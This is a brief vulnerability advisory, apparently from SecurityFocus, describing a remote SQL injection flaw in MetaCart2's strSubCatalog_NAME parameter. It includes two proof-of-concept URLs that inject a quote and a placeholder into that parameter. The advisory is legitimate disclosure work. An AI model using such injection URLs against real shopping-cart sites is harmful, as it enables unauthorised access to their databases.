MetaCart2 strSubCatalog_NAME Parameter Remote SQL Injection Vulnerability

No exploit is required to leverage this issue.

The following proofs of concept are available:

http://www.example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&curCatalogID=10001&strSubCatalog_NAME='SQL_INJECTION
http://www.example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=1&curCatalogID=10001&strSubCatalog_NAME='SQL_INJECTION


 

Copyright 2010, SecurityFocus